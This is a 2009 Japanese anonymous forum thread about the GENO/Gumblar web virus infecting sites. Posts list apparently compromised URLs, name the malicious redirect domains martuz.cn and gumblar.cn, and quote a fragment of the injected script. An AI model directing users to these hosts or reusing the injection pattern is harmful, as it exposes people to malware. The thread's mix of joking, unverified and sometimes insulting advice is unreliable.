セキュ板総受けの同人誌出すわ
147名無しさん@お腹いっぱい。:2009/05/16(土) 21:47:00
とりあえず余計なサイトみなきゃいいと思ってたけど
一般のサイトもやられてるわけで…
148名無しさん@お腹いっぱい。:2009/05/16(土) 21:47:14
>>140
ノートン先生ですけど、現在休暇中です
149名無しさん@お腹いっぱい。:2009/05/16(土) 21:47:49
ものすごい自演臭いスレですね。
150名無しさん@お腹いっぱい。:2009/05/16(土) 21:47:56
>>147
つ携帯
151名無しさん@お腹いっぱい。:2009/05/16(土) 21:48:25
>>147
同人の奴らが馬鹿なだけで
他のサイトは大丈夫でしょ
152名無しさん@お腹いっぱい。:2009/05/16(土) 21:48:28
バカス臭いな
153名無しさん@お腹いっぱい。:2009/05/16(土) 21:48:30
でかいサイトがやられたら日本沈没する
154名無しさん@お腹いっぱい。:2009/05/16(土) 21:48:31
GENOウイルス×ノートン先生
155126:2009/05/16(土) 21:48:38
>>132
なるほど、同人系のサイトが感染喰らって慌ててたってところか…
今更な気がするけど

>>135
バスターも何かやらかしたのか…
156名無しさん@お腹いっぱい。:2009/05/16(土) 21:48:56
>>150
linux使えよ。
おまえら、linuxは腐女子の基本にしろ
そんくらい使いこなせないで、腐女子なのるな
風下だぜ
157名無しさん@お腹いっぱい。:2009/05/16(土) 21:48:58
googleの検索結果をいじるって面白いな
他の検索エンジンの結果は通常なんだろうか
158名無しさん@お腹いっぱい。:2009/05/16(土) 21:49:10
GENOのニュースとか日本国外の感染状況はどうなっている?
159名無しさん@お腹いっぱい。:2009/05/16(土) 21:49:16
2chだけPCで見て、一般サイトは携帯で見てるわ
160名無しさん@お腹いっぱい。:2009/05/16(土) 21:49:23
>>150
画面小さくてな…
まあ沈静化するまでは最低限そうするわ
161名無しさん@お腹いっぱい。:2009/05/16(土) 21:49:29
>>140
Linux
162名無しさん@お腹いっぱい。:2009/05/16(土) 21:50:01
>>153
いやM$が崩壊するだけさ。
linuxが世界を席巻する
163名無しさん@お腹いっぱい。:2009/05/16(土) 21:50:07
早く対策されて普通に駆除できるようにならんものかなぁ
164名無しさん@お腹いっぱい。:2009/05/16(土) 21:50:07
新たな「Webウイルス」が猛威、感染被害が急増:ITpro
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/

同社が「JSRedir-R」と命名したもの。
実体はJavaScriptで書かれたプログラム(図1)。
多くの場合、攻撃者は何らかの方法で正規サイトに不正アクセスし、
このウイルスをWebページに埋め込む。
そのページにユーザーがアクセスすると、埋め込まれたウイルスが動き出し、
別のウイルスを勝手にインストールされる恐れなどがある。

これ、GENOウィルス?
165名無しさん@お腹いっぱい。:2009/05/16(土) 21:50:21
もしもヤフーやグーグルがやられたらどうなってしまうだろうか
166名無しさん@お腹いっぱい。:2009/05/16(土) 21:50:31
>>155
同人だけ異様に発見されてるww
167名無しさん@お腹いっぱい。:2009/05/16(土) 21:50:44
ウィルスセキュリティは、大丈夫ですか?
168名無しさん@お腹いっぱい。:2009/05/16(土) 21:51:08
>>164
それだ
169名無しさん@お腹いっぱい。:2009/05/16(土) 21:51:11
>>165
googleは一時期感染報告あったが多分デマ
170名無しさん@お腹いっぱい。:2009/05/16(土) 21:51:21
よくわかんないけどホモサイトにいかなきゃいいんだろ
171名無しさん@お腹いっぱい。:2009/05/16(土) 21:51:33
avastがプッシュされてるのはほかのに比べてよく検知出来てるから?
172名無しさん@お腹いっぱい。:2009/05/16(土) 21:51:37
>>165
グーグルでも感染例が報告済み
173140:2009/05/16(土) 21:51:37
ノートン先生は対策してるのか?
174名無しさん@お腹いっぱい。:2009/05/16(土) 21:51:54
>>169
googleの検索結果改竄とごっちゃになってただけだと思う。
175名無しさん@お腹いっぱい。:2009/05/16(土) 21:52:01
>>169
多分検索先読みの話がごっちゃになってたんだろな
176名無しさん@お腹いっぱい。:2009/05/16(土) 21:52:10
>>173
ノートンはおねんねタイムだよ
177名無しさん@お腹いっぱい。:2009/05/16(土) 21:52:26
>>170 住人だけど、大丈夫だよ。
178名無しさん@お腹いっぱい。:2009/05/16(土) 21:52:30
過去スレ読めよ
179名無しさん@お腹いっぱい。:2009/05/16(土) 21:52:30
>>164
俺ら大勝利wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
180名無しさん@お腹いっぱい。:2009/05/16(土) 21:52:33
>>173
俺の隣で寝てるから安心汁
181名無しさん@お腹いっぱい。:2009/05/16(土) 21:52:50
>>171
貧乏人が多いスレだから

182名無しさん@お腹いっぱい。:2009/05/16(土) 21:53:07
ニコニコの覗き見検索とやらは?
183名無しさん@お腹いっぱい。:2009/05/16(土) 21:53:12
ノートン先生は月曜にならないと起きませんw
184名無しさん@お腹いっぱい。:2009/05/16(土) 21:53:32
http://pc11.2ch.net/test/read.cgi/sec/1242125567/
答えは全てここにある!
185名無しさん@お腹いっぱい。:2009/05/16(土) 21:53:34
>>170
公式サイトでも感染してるくらいのウィルスですよ。
同人サイトも見に行かないほうがいいですが、他にも気をつけましょう。
186名無しさん@お腹いっぱい。:2009/05/16(土) 21:53:35
>>163
>>165
だから、Linux使ってれば関係ないってば。
他の惑星系のインフレくらい影響がない。
187名無しさん@お腹いっぱい。:2009/05/16(土) 21:53:47
>>171
このウィルスに対して反応が早かった
188名無しさん@お腹いっぱい。:2009/05/16(土) 21:53:48
>>170
ホモというかアニメとかオタク系は全滅みたいだよ
189名無しさん@お腹いっぱい。:2009/05/16(土) 21:54:28
>>170
へたなんとかってのが公式感染しててやばいみたいよ
メシウマですけどね
190名無しさん@お腹いっぱい。:2009/05/16(土) 21:54:30
>>173
一緒にお風呂に入ってるよ
191名無しさん@お腹いっぱい。:2009/05/16(土) 21:54:41
macのbootcamp使いも危ねえのかなーこれは
192名無しさん@お腹いっぱい。:2009/05/16(土) 21:55:12
狐かoperaでおk?
193名無しさん@お腹いっぱい。:2009/05/16(土) 21:55:13
>>173
今アップ中
月曜日まで待ってろってばっちゃが言ってた
194127:2009/05/16(土) 21:55:32
誰か教えてくだしあ…
195名無しさん@お腹いっぱい。:2009/05/16(土) 21:55:48
196名無しさん@お腹いっぱい。:2009/05/16(土) 21:55:48
>>194
ググれ
197名無しさん@お腹いっぱい。:2009/05/16(土) 21:55:54
>>164
図1 「JSRedir-R」の一部(ソフォスの情報から引用)。
同ウイルスの実体は、JavaScriptで記述されたプログラム。
難読化された状態でWebページに埋め込まれる

http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/?SS=imgview&FD=-654642772&ST=securityhole
198171:2009/05/16(土) 21:56:11
>>187
なるほどThx
199名無しさん@お腹いっぱい。:2009/05/16(土) 21:56:48
ベホマ
200名無しさん@お腹いっぱい。:2009/05/16(土) 21:56:49
ウィルスセキュリティZEROは?
201名無しさん@お腹いっぱい。:2009/05/16(土) 21:56:55
>>188
そういうレベルの問題じゃないよ
202名無しさん@お腹いっぱい。:2009/05/16(土) 21:57:17
>>199
キアリーだろ
203名無しさん@お腹いっぱい。:2009/05/16(土) 21:57:29
>>200
さようなら
204名無しさん@お腹いっぱい。:2009/05/16(土) 21:57:35
次スレたったのか
205名無しさん@お腹いっぱい。:2009/05/16(土) 21:57:41
>>199
あえてぱふぱふ
206名無しさん@お腹いっぱい。:2009/05/16(土) 21:57:41
>>200
先生以外のソフトならおk!
207名無しさん@お腹いっぱい。:2009/05/16(土) 21:57:49
>>194
avast入れればおk
対応してるかは知らないけど
208名無しさん@お腹いっぱい。:2009/05/16(土) 21:58:02
ヒットエンドラーン
209名無しさん@お腹いっぱい。:2009/05/16(土) 21:58:11
>>201
いや、同人関係がほとんどなんだが
210名無しさん@お腹いっぱい。:2009/05/16(土) 21:58:13
キアリクだろ
211名無しさん@お腹いっぱい。:2009/05/16(土) 21:58:20
>>200
インドに帰れよ
212名無しさん@お腹いっぱい。:2009/05/16(土) 21:59:00
>>200

何それ
213名無しさん@お腹いっぱい。:2009/05/16(土) 21:59:23
同人同人いってるが
それ含めウェブサイトがやべーっていってんだろ
214名無しさん@お腹いっぱい。:2009/05/16(土) 21:59:27
>>200
K7って書いてくれないと通じないんだけど?
215名無しさん@お腹いっぱい。:2009/05/16(土) 21:59:59
>>209
別に同人関係だけで出回ってるウイルスじゃないから
216名無しさん@お腹いっぱい。:2009/05/16(土) 22:00:06
こういう時いつも思うんだが先生っていつ仕事してんのかな
217名無しさん@お腹いっぱい。:2009/05/16(土) 22:00:16
「ウイルス対策ソフトでるから余裕w」と思ってそのまま放置とかありえそうで怖い
218名無しさん@お腹いっぱい。:2009/05/16(土) 22:00:28
なんか同人関係を叩けば安心しちゃう変な子がいるな
219名無しさん@お腹いっぱい。:2009/05/16(土) 22:00:35
220名無しさん@お腹いっぱい。:2009/05/16(土) 22:00:39
>>164
やっと来たか…
しかしこれsophosが言ってるのを載せただけだし
日本国内のサイトがいかにやばい状態になってるかはこれじゃわからないだろうな
221名無しさん@お腹いっぱい。:2009/05/16(土) 22:00:43
検体が欲しいのでだれか感染したサイトのURLplz
222名無しさん@お腹いっぱい。:2009/05/16(土) 22:00:57
>>216
俺らが寝てるときこっそり仕事してるよ
223名無しさん@お腹いっぱい。:2009/05/16(土) 22:01:46
>>216
ノートン先生の本業はPCを重くすることだぞ
224名無しさん@お腹いっぱい。:2009/05/16(土) 22:01:48
俺の他愛ない喧嘩してんの?っていう言葉で
両親が本当に険悪な雰囲気になってしまった
これもウィルスのせい?
225名無しさん@お腹いっぱい。:2009/05/16(土) 22:01:52
ここに書かれてる対策して、あとは月曜まで携帯でネッサ
これでおk
226名無しさん@お腹いっぱい。:2009/05/16(土) 22:01:53
K7は、大丈夫なんでしょうか?
227名無しさん@お腹いっぱい。:2009/05/16(土) 22:02:08
検体スレいけ
228名無しさん@お腹いっぱい。:2009/05/16(土) 22:02:37
ペストバトロールはどうですか?
229名無しさん@お腹いっぱい。:2009/05/16(土) 22:02:43
先生ありがとう・・・ 先生のことは忘れません・・・
230名無しさん@お腹いっぱい。:2009/05/16(土) 22:02:46
>>226
インドへお帰りください
231名無しさん@お腹いっぱい。:2009/05/16(土) 22:02:51
>>23
変わったって何で分かったの?
232名無しさん@お腹いっぱい。:2009/05/16(土) 22:03:05
ノートン先生にはがんばってほしい
233名無しさん@お腹いっぱい。:2009/05/16(土) 22:03:21
遊んでるバカが職場のPCでやらかしそうで怖い
234名無しさん@お腹いっぱい。:2009/05/16(土) 22:03:33
>>224
主に祭り厨のせい
あいつらはとにかくスレで騒いでテンション上げることだけが目的でウイルスとかどうなってもいいんだろ
235名無しさん@お腹いっぱい。:2009/05/16(土) 22:04:00
>>226
だから先生以外は大丈夫ってさっきから書いてるだろ
236名無しさん@お腹いっぱい。:2009/05/16(土) 22:04:27
先生は、いつ仕事しているんですか?
237名無しさん@お腹いっぱい。:2009/05/16(土) 22:04:29
へんなjavaスクが書いてあるページをjavaスクonにしてブラウザで表示させたらヤバいってことなら、
WWWCでアイコンを右クリック→ソースの表示
 (例えばです。他にも一杯やりかたあるんだろうけど。)
で、ソースに変なコードがあるかどうか見てみればいいんじゃないの?
238名無しさん@お腹いっぱい。:2009/05/16(土) 22:05:00
>>164
同一なら、世界でも猛威を振るっていると言うことか・・・。
239名無しさん@お腹いっぱい。:2009/05/16(土) 22:05:03
>>226
そんなフリーソフトはダメに決まってるだろボケ
240名無しさん@お腹いっぱい。:2009/05/16(土) 22:05:22
>>237
そんな作業が普通にできる奴なら最初から問題ないんじゃね
241名無しさん@お腹いっぱい。:2009/05/16(土) 22:05:31
感染してる奴って自分のサイトみて気付かないわけ?
242名無しさん@お腹いっぱい。:2009/05/16(土) 22:06:02
ゼロとキングソフトは論外
243名無しさん@お腹いっぱい。:2009/05/16(土) 22:06:05
同人サイトから責任を逸らそうとするのが多いなww
ここ最近発見されてるのは同人だけだが…?
244名無しさん@お腹いっぱい。:2009/05/16(土) 22:06:10
>>237
その通り。それである程度防げる
で、お前はその作業をページが移るたびにやるつもりか?
245名無しさん@お腹いっぱい。:2009/05/16(土) 22:06:23
>>241
うんこくさいのにうんこついてない
つまりそういうこと
246名無しさん@お腹いっぱい。:2009/05/16(土) 22:07:04
カスペなら安心ですか?
247名無しさん@お腹いっぱい。:2009/05/16(土) 22:07:06
パスMyPicturesまたはボリュームが無効です。

削除できない
248名無しさん@お腹いっぱい。:2009/05/16(土) 22:07:07
>>241
同人スレ行ってみな何も分かってないよ
249名無しさん@お腹いっぱい。:2009/05/16(土) 22:07:33
http://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
慌てた同人のやつらとかひっかかりそうだな
250名無しさん@お腹いっぱい。:2009/05/16(土) 22:07:41
スレ伸び加速しすぎw
251名無しさん@お腹いっぱい。:2009/05/16(土) 22:07:47
ああ、同人サイトって同人誌無断でアップしてるサイトじゃなくて作ってる方の連中が引っ掛かってるのか
なんか思いっきり勘違いしてた
252名無しさん@お腹いっぱい。:2009/05/16(土) 22:07:48
>>241
このウイルスは人を脅かすのが目的ではなく
こっそり各種情報を抜き取るのが目的なんで
感染しているかどうかはできるだけ見た目で判断できないように工夫している

騒ぎの初期には「cmd.exeが起動すれば安心!」みたいなお手軽判定法があったが、
とっくに対策された亜種が出回ってるようだ。
253名無しさん@お腹いっぱい。:2009/05/16(土) 22:08:05
>>245
じゃあ感染者がソースみてもなんも書いてないけど周りはソース改竄されてるのは見えるわけ?
254名無しさん@お腹いっぱい。:2009/05/16(土) 22:08:29
>>23
これほんとなの?
どこ情報?
255名無しさん@お腹いっぱい。:2009/05/16(土) 22:08:44
先生はパルスアップデートで何をアップデートしてるんだよ・・・
256名無しさん@お腹いっぱい。:2009/05/16(土) 22:09:10
>>243
なんでそんなに同人界隈と闘いたがるの?
ウイルス問題を摩り替えてない?
257名無しさん@お腹いっぱい。:2009/05/16(土) 22:09:17
>>255
あんなの自己満に過ぎないさ
258名無しさん@お腹いっぱい。:2009/05/16(土) 22:09:39
マジな話だけどIE7,8の「InPrivate」使えば大丈夫じゃね?
259名無しさん@お腹いっぱい。:2009/05/16(土) 22:09:51
>>255
ファイルの日付
260名無しさん@お腹いっぱい。:2009/05/16(土) 22:10:17
>>244
うん。
いっつも行くサイトの更新チェックだけでもしたかったから。
でもよく考えたら、あらゆるページをそやって確認するのなんか、
確かにめんどくさ過ぎるわな。
261名無しさん@お腹いっぱい。:2009/05/16(土) 22:10:30
>>258
おまえ感染してるよ
お疲れさん
262名無しさん@お腹いっぱい。:2009/05/16(土) 22:10:32
>>258
大丈夫かどうか試してみ
263名無しさん@お腹いっぱい。:2009/05/16(土) 22:10:40
検体スレってどこ?
264名無しさん@お腹いっぱい。:2009/05/16(土) 22:11:11
WindowsUpdateが重いが
この件で殺到してるのだろうか
265名無しさん@お腹いっぱい。:2009/05/16(土) 22:11:24
バタリアン並みの感染スピードw
266名無しさん@お腹いっぱい。:2009/05/16(土) 22:11:41
腐とボカロと東方死亡∩(・ω・)∩バジャーイ
267名無しさん@お腹いっぱい。:2009/05/16(土) 22:11:41
>>259
ご丁寧に時間まで更新してるらしいな
268名無しさん@お腹いっぱい。:2009/05/16(土) 22:12:13
>>266
害悪ジャンル壊滅かざまあ
269名無しさん@お腹いっぱい。:2009/05/16(土) 22:12:15
>>264
ソンビ化したPCがDDoSやってるのかも
270名無しさん@お腹いっぱい。:2009/05/16(土) 22:12:30
捨てようと思ったのにエラーになるわ
271名無しさん@お腹いっぱい。:2009/05/16(土) 22:12:31
ノートンのファン回りっぱなし状態はどうにかならないの?
272名無しさん@お腹いっぱい。:2009/05/16(土) 22:12:31
>>265

ゾンビのくせに走るのは画期的だったな。
273名無しさん@お腹いっぱい。:2009/05/16(土) 22:12:51
>>267
先生ちゃんと仕事してるじゃん
274名無しさん@お腹いっぱい。:2009/05/16(土) 22:13:05
せんせいは やればできるこ
275名無しさん@お腹いっぱい。:2009/05/16(土) 22:13:06
リカバリディスクが見つからなくてクリーンインストールできない、けれど仕事でPCを
使わざるを得ない場合はどうするのがいいんでしょうか。
276名無しさん@お腹いっぱい。:2009/05/16(土) 22:13:17
>>261
opera使いの俺には関係ない話だ
277名無しさん@お腹いっぱい。:2009/05/16(土) 22:13:18
>>263
【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/

これかな?
278名無しさん@お腹いっぱい。:2009/05/16(土) 22:13:30
>>275
仕事を辞める
279名無しさん@お腹いっぱい。:2009/05/16(土) 22:13:32
>>266
(* >ω<)=3プー
そこらへんは全部いらないな
280名無しさん@お腹いっぱい。:2009/05/16(土) 22:14:06
>>209
それはお前が見てるサイトだけだろ
ほかにもある
281名無しさん@お腹いっぱい。:2009/05/16(土) 22:14:18
腐女子寝ないの?w
282名無しさん@お腹いっぱい。:2009/05/16(土) 22:14:57
>>280
もう触るなよ
283名無しさん@お腹いっぱい。:2009/05/16(土) 22:15:07
>>275
取扱説明書に内部リカバリ手順が載ってるならそれで
駄目ならそのまま繋いで会社全体にウイルスばら撒いて責任問題に発展させる
自殺するなよ
284名無しさん@お腹いっぱい。:2009/05/16(土) 22:15:12
小林製薬はCM流す暇合ったら注意喚起しろよ
285名無しさん@お腹いっぱい。:2009/05/16(土) 22:15:31
CA使ってる自分は負け組
286名無しさん@お腹いっぱい。:2009/05/16(土) 22:15:46
同人で大事になってるのは
子供や情弱がちゃんとわかってる人に話しかけられる環境があるからだよ。
普通のコミュニティでは子供は子供、情弱は情弱でまとまってるからそのまま気づかない。
287名無しさん@お腹いっぱい。:2009/05/16(土) 22:16:03
>>277
難しくてよくわからねえ・・・ ありがとう
288名無しさん@お腹いっぱい。:2009/05/16(土) 22:16:03
>>275
正直に上司に相談しろ 絶対会社のネットワークに繋ぐな
289名無しさん@お腹いっぱい。:2009/05/16(土) 22:16:07
>>279
709 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/10(金) 00:13:27
ニコ動で動画再生するとCPU使用率が
50前後ぐらいいくんだけど元々、そんなもんかねぇ

コレお前?
290名無しさん@お腹いっぱい。:2009/05/16(土) 22:16:10
仮想化してれば平気?
291名無しさん@お腹いっぱい。:2009/05/16(土) 22:16:31
>>285
ペンタゴンの人?
292名無しさん@お腹いっぱい。:2009/05/16(土) 22:17:02
ネットサーフィンしてたらAVASTが警告出してきたのですぐ閉じた
感染したかと思い再起動してからウィルスチェックしたら何も無し
普通に信用して開いてたら死んでたわ
293名無しさん@お腹いっぱい。:2009/05/16(土) 22:17:12
スレから離れられなくて、うんこ漏れそう
294名無しさん@お腹いっぱい。:2009/05/16(土) 22:17:27
>>289
それどこのスレの奴だよw
295名無しさん@お腹いっぱい。:2009/05/16(土) 22:17:31
>>286
ああ、それっぽいな
普通なら感染も防げるし、
もしなっても自分で調べればわかるかな
296名無しさん@お腹いっぱい。:2009/05/16(土) 22:17:31
>>293
ノートン先生で解決だ
297名無しさん@お腹いっぱい。:2009/05/16(土) 22:17:50
XPで管理者権限でネットやってる馬鹿が多いって笑えるね

制限者でネット繋げばウイルスソフトも要らないのにwww
298名無しさん@お腹いっぱい。:2009/05/16(土) 22:17:59
もしニコニコとかが感染したら一気に広がりそうだなこれ
299名無しさん@お腹いっぱい。:2009/05/16(土) 22:18:29
>>297
ウイルスソフトなんていらねえよww
300名無しさん@お腹いっぱい。:2009/05/16(土) 22:18:45
まだ腐ヲチ・同人ヲチしてるやつはなんなの?自分が荒らしてることに気づかないの?
301名無しさん@お腹いっぱい。:2009/05/16(土) 22:18:45
>>298
とっくにやられてたわけだが
302名無しさん@お腹いっぱい。:2009/05/16(土) 22:18:47
513 名前:geno[sage] 投稿日:2009/05/16(土) 21:56:55 ID:GQnaax2E0
痛ニュとかの有名どころのコピペブログ感染してるな
ライブドアもか
303名無しさん@お腹いっぱい。:2009/05/16(土) 22:18:50
>>296
垂れ流しちゃえ
304名無しさん@お腹いっぱい。:2009/05/16(土) 22:19:07
>>296
先生万能すぐる
305名無しさん@お腹いっぱい。:2009/05/16(土) 22:19:14
>>299
恒例の流れになってんなw
306名無しさん@お腹いっぱい。:2009/05/16(土) 22:19:44
>283
内部リカバリーの存在をすっかり忘れていました!
マジで感謝です。

これってパーティションで区切ってあるDドライブの方はそのままでも大丈夫ですか?
307名無しさん@お腹いっぱい。:2009/05/16(土) 22:19:47
サイトにウィルスコードを埋め込むってウィルスから取得したパスワードとかの
情報を使って第三者が改ざんするってこと?
308名無しさん@お腹いっぱい。:2009/05/16(土) 22:19:48
ウイルスソフトって何?
バスターのことかい?
309名無しさん@お腹いっぱい。:2009/05/16(土) 22:19:58
>>301
やられてたのはsaymoveの覗き見検索じゃないのか?
ニコニコ自体がやられてたら、それはそれでおもしろそうなんだが
310名無しさん@お腹いっぱい。:2009/05/16(土) 22:20:20
東方ジャンルが死んだのはめでたい
311名無しさん@お腹いっぱい。:2009/05/16(土) 22:20:37
javaオフでも感染する場合があるんだっけ?
もうフラフラできんな
2chブラウザで2chしか見れなくなりそう
312名無しさん@お腹いっぱい。:2009/05/16(土) 22:20:42
>>306
やるだけやってみて駄目なら諦めたら?
313名無しさん@お腹いっぱい。:2009/05/16(土) 22:20:46
>>307
FTPで接続したときパスとかバレて第三者に云々
314名無しさん@お腹いっぱい。:2009/05/16(土) 22:21:03
パケモン感染しねえかな
315名無しさん@お腹いっぱい。:2009/05/16(土) 22:21:41
野球やろーぜ
316名無しさん@お腹いっぱい。:2009/05/16(土) 22:21:46
エロマンガサイトで感染したのって出た?
317名無しさん@お腹いっぱい。:2009/05/16(土) 22:22:13
>>302
釣り乙
318名無しさん@お腹いっぱい。:2009/05/16(土) 22:22:19
野球ch感染してるんじゃね?
319名無しさん@お腹いっぱい。:2009/05/16(土) 22:22:21
>>316
またエロマンガ見てる・・・
320名無しさん@お腹いっぱい。:2009/05/16(土) 22:22:39
そりゃウイルス作者だって書き込めるんだしチェックは絶対してるんだろうから
荒らしもするんじゃない?
321名無しさん@お腹いっぱい。:2009/05/16(土) 22:23:21
>>164
正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

これもGENOウィルスかな。
322名無しさん@お腹いっぱい。:2009/05/16(土) 22:23:54
>>286
同人関係はネット上で規模のあるコミュニティを形成してるから
情報が伝わりやすいってのがあるんじゃないか?絶対数の差もあるんだろうけど。

いかにも一般人な人がやってるサイトだとそういう情報って伝播しにくいだろうな。
ここですらよく判ってない奴多すぎだし、IT情報に疎い種類の連中は大変だ。
323名無しさん@お腹いっぱい。:2009/05/16(土) 22:24:28
壺に入ってたら大騒ぎだろうな
324名無しさん@お腹いっぱい。:2009/05/16(土) 22:24:31
>>221
>>1のサイトとリンク先を参考にした現在の感染サイト
スレで報告あったサイト含む
漏れがあったらレスよろ

p-frying■com/
www■zengozen■co■jp/pic/keturosyumire-syonn■htm
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
www■k-q-bury■com/
expss■main■jp/expss2/2005/01/
www■livmail■com/
325名無しさん@お腹いっぱい。:2009/05/16(土) 22:24:50
同人・ヲタ系以外で感染してる有名サイトってどこなんだ?
326名無しさん@お腹いっぱい。:2009/05/16(土) 22:25:25
>>313
そうゆうことかありがとう、じゃあ自分のブログはFTP接続じゃないから大丈夫だな。
327名無しさん@お腹いっぱい。:2009/05/16(土) 22:26:17
うぜええ
328名無しさん@お腹いっぱい。:2009/05/16(土) 22:26:41
>>324
www■senlights■co■jp/seihin/kirenaru-1s■htm

俺はここから感染してるっぽい
329名無しさん@お腹いっぱい。:2009/05/16(土) 22:27:19
>>298
2chと関わりのあるBIG-server.comが感染してた事例もあるからなあ
ニコ動も無縁ではないかも

【BIG-server.com】maido3.comがウイルスにより改竄、ウイルススキャンのお願いとお詫び[05/11]
http://gimpo.2ch.net/test/read.cgi/owabiplus/1242055283/
330名無しさん@お腹いっぱい。:2009/05/16(土) 22:28:04
ふたば感染してるって全板感染してるの?
331名無しさん@お腹いっぱい。:2009/05/16(土) 22:28:25
ウィルス、命名されたか。(多分)海外での感染源は、トラフィックの多いアダルトサイトか。
しかし、検出可否スレでも新種が見つかっているようだな・・・。
332名無しさん@お腹いっぱい。:2009/05/16(土) 22:28:37
ふたばはガセじゃなかったか
333名無しさん@お腹いっぱい。:2009/05/16(土) 22:29:13
74 ヤマボウシ(dion軍) [sage] 2009/05/16(土) 22:01:12.03 ID:qgx0kH7v
【特徴】
・亜種大杉 セキュリティソフトが対応しきれていない
 症状もまちまちでいまいち決定打が無い
・ftpを介して感染者のサイトをゾンビ化
・トラフィックが監視されてるから、ID・Passやクレカ番号が筒抜け
 Botnet汚染や、キャプチャ画像の送信の疑いと言う情報もあり
・クリーンインストールが唯一の対処法
・キンタマなどとは違い感染源が明確なので、
 感染源の企業などから圧力がかかってしまう。よってマスコミの報道も消極的
334名無しさん@お腹いっぱい。:2009/05/16(土) 22:29:22
ソースチェッカーでなにも出ない場合は少しは安心してもいいんですかね
335名無しさん@お腹いっぱい。:2009/05/16(土) 22:29:58
>>334
ユーザーエージェントみてるからSCOでも変えないとでない
336名無しさん@お腹いっぱい。:2009/05/16(土) 22:30:26
ニュースサイトどっか取り上げてないのん
337名無しさん@お腹いっぱい。:2009/05/16(土) 22:30:38
>>311
何度も出てるけどJavaScriptな
338名無しさん@お腹いっぱい。:2009/05/16(土) 22:30:42
さっきエクスプローラーが異常終了してびびった。
cmdもregeditも起動するしsqlsodbc.chmも問題なかった。
怖いからwin7beta使うことにする。
339名無しさん@お腹いっぱい。:2009/05/16(土) 22:31:22
avastでスキャンする場合圧縮ファイルもやったほうがいいの?
340名無しさん@お腹いっぱい。:2009/05/16(土) 22:31:28
>>334
ソースの内容まで見ろよ
安全度100%でも感染してる
341名無しさん@お腹いっぱい。:2009/05/16(土) 22:32:13
2chが感染したら日本終わるな
342名無しさん@お腹いっぱい。:2009/05/16(土) 22:33:29
信じられるのは自分だけだってばっちゃが言ってた
343名無しさん@お腹いっぱい。:2009/05/16(土) 22:34:02
>>294
714 名前:709[sage] 投稿日:2009/04/10(金) 00:33:30
>>713
>>709は私だ(* >ω<)=3プー

GENOウイルススレ 「1」だw
344名無しさん@お腹いっぱい。:2009/05/16(土) 22:34:37
>>328
martuz.cnに飛ばされるね。
比較的最近感染したサイトのかもしれない。
345名無しさん@お腹いっぱい。:2009/05/16(土) 22:36:20
>>344
へえそうなんだ 怖くて開けられないけど
親父がIE7でそこ閲覧した時に感染したっぽい
346名無しさん@お腹いっぱい。:2009/05/16(土) 22:36:40
クリーンインスコしてもFTPのパス変えないと意味ないってさ
また改竄されるらしい
347名無しさん@お腹いっぱい。:2009/05/16(土) 22:37:00
>>326
FTPだけじゃないです
348名無しさん@お腹いっぱい。:2009/05/16(土) 22:37:31
知ってるから
349名無しさん@お腹いっぱい。:2009/05/16(土) 22:37:45
ホラー映画作れそう
350名無しさん@お腹いっぱい。:2009/05/16(土) 22:37:57
DLsite.comだけは
感染しませんように( -人-)
351名無しさん@お腹いっぱい。:2009/05/16(土) 22:37:57
>>324
Firefoxでアクセスしてみたけど全部
martuz■cn/vid/?id=
からファイルを取ろうとするね。それでそこに直接行っても
// No news...
と表示されるだけ。。IEじゃないとだめか・・
352名無しさん@お腹いっぱい。:2009/05/16(土) 22:38:35
なんか話通じない人いるよね
353名無しさん@お腹いっぱい。:2009/05/16(土) 22:39:02
>>347
FTPて何だか教えて下さい
354名無しさん@お腹いっぱい。:2009/05/16(土) 22:39:41
巨大ボットネット発見,190万台の感染マシンで構成
http://itpro.nikkeibp.co.jp/article/NEWS/20090423/329035/
355名無しさん@お腹いっぱい。:2009/05/16(土) 22:40:15
よく分からんけど
.cnを全部弾いたらおk?
356名無しさん@お腹いっぱい。:2009/05/16(土) 22:40:31
スレの最初に書いてる以外の方法で感染確認する方法はない?
357名無しさん@お腹いっぱい。:2009/05/16(土) 22:40:37
>>353
知らないなら気にしなくて良い
358名無しさん@お腹いっぱい。:2009/05/16(土) 22:40:40
>>318 なん実Jにも広がってるなw
ttp://baseball.fan-site.net/uhyo/tan/img/2694.jpg
359名無しさん@お腹いっぱい。:2009/05/16(土) 22:40:40
ひどい広がり様
360名無しさん@お腹いっぱい。:2009/05/16(土) 22:40:59
>>328
unescapeしてみたよ
martuz.cn だってさ
ホームページトップからして改ざんされとった

こりゃパターンマッチむずいな...
src=//mar"+"tux.cn/vid
とかなってた。連結の位置ずらしただけでマッチしないよねぇ
361名無しさん@お腹いっぱい。:2009/05/16(土) 22:41:16
662 名前:GENO 報告 [sage] 投稿日:2009/05/16(土) 22:37:44 ID:5Y6mJ8vc0
 商業乙女ゲー(PC)のリボンマジック公式サイト
 アクセスしようとするとGoogleにブロックされて下記のメッセージ

 >不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。
362名無しさん@お腹いっぱい。:2009/05/16(土) 22:42:04
他人に感染させる経路はFTPだけ?
フラッシュメモリからなら感染したPCからデータ受け取っても大丈夫?
363名無しさん@お腹いっぱい。:2009/05/16(土) 22:42:16
>>354
さらに強まったのが出てきそうだな
364名無しさん@お腹いっぱい。:2009/05/16(土) 22:43:06
>>361
また公式サイトが
365名無しさん@お腹いっぱい。:2009/05/16(土) 22:43:52
>>344
4/29の正午ぐらいに閲覧した時に感染したかもしれん
GENOの初出はいつだっけ
366名無しさん@お腹いっぱい。:2009/05/16(土) 22:44:55
感染してないけど何か不安だな
サイト一旦閉じて沈静化待つべきか
367名無しさん@お腹いっぱい。:2009/05/16(土) 22:45:06
しかし何でこんな急速に広まったんだ
もう下火ってイメージだったのに
368名無しさん@お腹いっぱい。:2009/05/16(土) 22:45:45
GENOはhostsで禁止してるからもう2度と見たい
